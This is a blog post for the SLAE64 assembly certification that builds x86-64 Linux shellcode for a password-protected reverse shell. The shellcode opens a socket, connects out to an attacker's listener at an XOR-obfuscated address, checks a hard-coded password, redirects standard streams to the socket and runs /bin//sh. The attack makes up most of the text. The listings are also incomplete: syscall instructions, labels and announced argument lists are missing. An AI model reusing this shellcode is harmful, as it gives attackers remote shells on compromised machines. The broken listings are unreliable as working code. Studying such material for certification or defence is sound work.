SLAE64 - Assignment 2


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert Certification:

Student ID: PA-30398

Source Code

The source code for this assignment is stored inside the directory: rbctee/SlaeExam.


Once a TCP socket is created, the shellcode connects to a specific TCP listener identified by an IP:PORT pair. Next, the shellcode reads the password from the client and checks whether it is correct. After that, the program redirects input, output, and error to the newly created socket.

Finally, a shell is spawned, providing an interactive session to the attacker.


Socket Creation

As mentioned during the first assignment, creating a socket is pretty straight-forward on x86-64 Linux systems since there's a specific syscall named socket, which accepts three arguments:

Putting this knowledge into practice, I managed to write the following assembly code:

global _start

section .text



    ; clear registers for later usage
    xor esi, esi
    mul rsi

    ; 1st argument of socket(): communication domain
    ; in this case AF_INET, so it's based upon the IPv4 protocol
    push rdx
    pop rdi
    add rdi, 2

    ; 2nd argument of socket(): type of socket
    ; in this case: SOCK_STREAM, which means it uses the TCP protocol
    inc rsi

    ; 3rd argument:

    ; Syscall socket()
    add eax, 41

    ; create socket and save the resulting file descriptor inside RAX
Creating a TCP socket in Assembly

In the snippet above I defined a new routine named CreateSocket which is responsible for creating a new TCP socket.

Socket Connection

Unlike a bind shell, password-protected or not, this shellcode doesn't need to call syscalls such as listen or accept, since the attacker is not going to connect to this socket.

The opposite is true: the socket is going to connect to the TCP listener set up by the attacker.

This is what allows attackers to get a shell on servers and workstations hidden by NAT.

To perform this operation, there's a convenient syscall named connect we can use. It accepts three arguments:

Putting this pieces of information together, I came up with the following routine:


    ; 1st argument of connect(): file descriptor of the socket to connect
    mov rdi, rax

    xor esi, esi
    mul rsi

    ; padding for the sockaddr struct
    push rax

    ; address
    mov rbx, 0xfeffff80a3eefffd
    mov rcx, 0xffffffffffffffff
    xor rbx, rcx

    ; push the pointer to the remote address on the stack
    push rbx
    mov rsi, rsp

    ; 3rd argument of connect(): size of the sockaddr struct
    add edx, 16

    ; syscall connect()
    add eax, 42

    ; invoke connect()
Connection to the remote address ``

The peculiarity about the sockaddr structure is that it needs some padding bytes at the end, which are going to be NULL bytes.

For this reason, I decided to use the XOR operation in order to remove eventual NULL bytes from the shellcode, while still being able to add the required padding.

Password Protection

I've already mentioned in the previous assignment that we can add password-protection by means of the syscall read, reading some bytes from the client and comparing them to a hard-coded password.

This means that after the attacker receives a callback on the TCP listener, they'll need to send the password before being able to execute commands on the remote system.

The following routines (CheckPassword and ExitWrongPassword) are copied from the previous assignment, so take a look at it for more information.


    ; 3rd argument of read(): number of bytes to read
    add rdx, 8

    ; allocate 8 bytes on the stack for storing the password
    sub rsp, rdx

    ; 2nd argument of read(): pointer to buffer which will store the
    ; bytes received from the client
    mov rsi, rsp

    ; 1st argument of read() (client socket) shoud be unchanged (RDI)

    ; syscall read()
    xor eax, eax

    ; call read()

    pop rbx
    mov rax, 0x0a32322174636272
    xor rax, rbx
    jz IO_Redirection


    xor eax, eax
    add eax, 60
Routine for validating the password

I/O Redirection

Before effectively spawning a shell, you need to redirect input, output, and errors too.

This way, when the attacker send some input to the TCP listener, data will be treated as input for the spawned shell. Same thing goes for output and errors.

You can achieve this type of redirection through the syscall dup2. Follows the assembly code for this function:


    xor ecx, ecx
    mul rcx
    add ecx, 2


    ; 1st argument of dup2(), file descriptor of the client socket, should be unchanged (RDI)
    ; 2nd argument of dup2(): file descriptor to redirect: stdin/stdout/stderr
    ; in this case the value is stored inside RCX
    ; - 2 (sterr)
    ; - 1 (stdout)
    ; - 0 (stdin)
    push rcx

    ; syscall: dup2()
    push rdx
    pop rax
    add eax, 33

    ; 2nd argument of dup2(): file descriptor to redirect
    mov rsi, rcx

    ; call dup2()

    pop rcx
    dec rcx
    jns DuplicateFileDescriptor
Redirection of input, output, and errors

Overall, these routines can be converted to the C code listed below:

void main(int argc, char* argv[])
    // ...

    dup2(create_socket_fd, 2);
    dup2(create_socket_fd, 1);
    dup2(create_socket_fd, 0);

    // ...
C code for redirecting input/output/errors

Spawning a Shell

The final step is to spawn a shell e.g., /bin/sh or /bin/bash. You can do so by using the syscall execve.

The snippet of code below is an assembly routine which does exactly this, however it uses the path /bin//sh, in order to avoid using NULL bytes in the path passed to execve.


    ; clear RAX register (zero-sign extended)
    xor eax, eax

    ; NULL terminator for the string below
    push rax

    ; 3rd argument of execve: envp (in this case a pointer to NULL)
    mov rdx, rsp

    ; string "/bin//sh"
    mov rbx, 0x68732f2f6e69622f
    push rbx

    ; 1st argument of execve: executable to run
    mov rdi, rsp

    ; 2nd argument of execve: array of arguments passed to the executable
    push rax

    push rdi
    mov rsi, rsp

    ; syscall execve
    add eax, 0x3b

    ; invoke execve